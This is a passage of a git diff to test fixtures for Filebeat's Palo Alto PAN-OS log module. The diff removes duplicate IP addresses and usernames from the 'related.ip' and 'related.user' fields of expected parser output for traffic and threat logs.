"jordy", "jordy" ], "rule.name": "rule1", @@ -9395,11 +9201,9 @@ "related.ip": [ "74.125.224.200", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -9487,11 +9291,9 @@ "related.ip": [ "74.125.224.198", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -9578,11 +9380,9 @@ "related.ip": [ "74.125.224.200", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json index 44f7a7790abc..a4ae1b157d9c 100644 --- a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json @@ -77,11 +77,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -176,11 +174,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -275,11 +271,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -377,11 +371,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -479,11 +471,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -578,11 +568,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -677,11 +665,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -779,11 +765,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -881,11 +865,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -983,11 +965,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1085,11 +1065,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1187,11 +1165,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1289,11 +1265,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1391,11 +1365,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1493,11 +1465,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1595,11 +1565,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1697,11 +1665,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1799,11 +1765,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1901,11 +1865,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2000,11 +1962,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2099,11 +2059,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2201,11 +2159,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2300,11 +2256,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2402,11 +2356,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2504,11 +2456,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2606,11 +2556,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2705,11 +2653,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2804,11 +2750,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2906,11 +2850,9 @@ "related.ip": [ "192.168.0.2", "98.149.55.63", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3008,11 +2950,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3107,11 +3047,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3209,11 +3147,9 @@ "related.ip": [ "192.168.0.2", "212.48.10.58", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3311,11 +3247,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3410,11 +3344,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3509,11 +3441,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3611,11 +3541,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3713,11 +3641,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3812,11 +3738,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3911,11 +3835,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4008,7 +3930,6 @@ "related.ip": [ "192.168.0.100", "8.8.8.8", - "0.0.0.0", "0.0.0.0" ], "rule.name": "rule1", @@ -4102,11 +4023,9 @@ "related.ip": [ "192.168.0.2", "62.211.68.12", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4202,7 +4121,6 @@ "related.ip": [ "192.168.0.100", "50.19.102.116", - "0.0.0.0", "0.0.0.0" ], "rule.name": "rule1", @@ -4299,11 +4217,9 @@ "related.ip": [ "192.168.0.2", "65.55.223.19", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4401,11 +4317,9 @@ "related.ip": [ "192.168.0.2", "65.55.223.24", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4498,7 +4412,6 @@ "related.ip": [ "192.168.0.100", "8.8.8.8", - "0.0.0.0", "0.0.0.0" ], "rule.name": "rule1", @@ -4595,11 +4508,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4694,11 +4605,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4796,11 +4705,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4895,11 +4802,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4994,11 +4899,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5093,11 +4996,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5192,11 +5093,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5291,11 +5190,9 @@ "related.ip": [ "192.168.0.2", "62.211.68.12", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5393,11 +5290,9 @@ "related.ip": [ "192.168.0.2", "212.48.10.58", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5495,11 +5390,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5594,11 +5487,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5696,11 +5587,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5795,11 +5684,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5894,11 +5781,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5996,11 +5881,9 @@ "related.ip": [ "192.168.0.2", "65.55.223.31", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6098,11 +5981,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6197,11 +6078,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6296,11 +6175,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6395,11 +6272,9 @@ "related.ip": [ "192.168.0.2", "62.211.68.12", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6494,11 +6369,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6593,11 +6466,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6692,11 +6563,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6794,11 +6663,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6893,11 +6760,9 @@ "related.ip": [ "192.168.0.2", "62.211.68.12", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6995,11 +6860,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -7094,11 +6957,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -7193,11 +7054,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -7295,11 +7154,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -7394,11 +7251,9 @@ "related.ip": [ "192.168.0.2", "8.5.1.1", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -7493,11 +7348,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -7592,11 +7445,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -7694,11 +7545,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -7786,11 +7635,9 @@ "related.ip": [ "192.168.0.2", "192.168.0.1", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -7888,11 +7735,9 @@ "related.ip": [ "192.168.0.2", "212.48.10.58", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -7990,11 +7835,9 @@ "related.ip": [ "192.168.0.2", "212.48.10.58", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -8082,11 +7925,9 @@ "related.ip": [ "192.168.0.2", "192.168.0.1", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -8174,11 +8015,9 @@ "related.ip": [ "192.168.0.2", "192.168.0.1", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -8276,11 +8115,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -8375,11 +8212,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -8474,11 +8309,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -8576,11 +8409,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -8675,11 +8506,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -8767,11 +8596,9 @@ "related.ip": [ "192.168.0.2", "192.168.0.1", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -8866,11 +8693,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -8968,11 +8793,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -9067,11 +8890,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -9166,11 +8987,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -9265,11 +9084,9 @@ "related.ip": [ "192.168.0.2", "62.211.68.12", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -9367,11 +9184,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -9469,11 +9284,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -9571,11 +9384,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -9663,11 +9474,9 @@ "related.ip": [ "192.168.0.2", "192.168.0.1", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -9765,11 +9574,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -9867,11 +9674,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -9969,11 +9774,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", diff --git a/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json b/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json index d03e24e00c7b..0d9b9000a970 100644 --- a/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json @@ -81,8 +81,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -186,8 +185,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -291,8 +289,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -396,8 +393,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -501,8 +497,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -606,8 +601,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -711,8 +705,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -816,8 +809,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -921,8 +913,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -1026,8 +1017,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -1131,8 +1121,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -1236,8 +1225,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -1341,8 +1329,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -1446,8 +1433,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -1551,8 +1537,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -1656,8 +1641,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -1761,8 +1745,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -1866,8 +1849,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -1971,8 +1953,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -2076,8 +2057,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -2181,8 +2161,7 @@ "related.ip": [ "192.168.15.224", "23.72.137.131", - "192.168.1.63", - "23.72.137.131" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "23.72.137.131", @@ -2286,8 +2265,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -2391,8 +2369,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -2496,8 +2473,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -2601,8 +2577,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -2706,8 +2681,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -2811,8 +2785,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -2916,8 +2889,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -3021,8 +2993,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -3126,8 +3097,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -3231,8 +3201,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -3336,8 +3305,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -3441,8 +3409,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -3546,8 +3513,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -3651,8 +3617,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -3756,8 +3721,7 @@ "related.ip": [ "192.168.15.224", "151.101.2.2", - "192.168.1.63", - "151.101.2.2" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "151.101.2.2", @@ -3864,8 +3828,7 @@ "related.ip": [ "192.168.15.224", "54.192.7.152", - "192.168.1.63", - "54.192.7.152" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.192.7.152", @@ -3972,8 +3935,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -4080,8 +4042,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -4188,8 +4149,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -4296,8 +4256,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -4404,8 +4363,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -4512,8 +4470,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -4620,8 +4577,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -4728,8 +4684,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - 